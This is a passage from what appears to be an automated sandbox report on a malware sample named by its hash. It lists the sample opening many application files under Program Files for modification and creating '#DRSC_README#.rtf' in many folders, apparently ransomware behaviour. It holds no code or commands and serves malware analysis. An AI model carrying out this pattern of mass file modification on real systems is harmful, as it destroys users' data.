modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ru.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\de.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\nacl_irt_x86_64.nexe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification 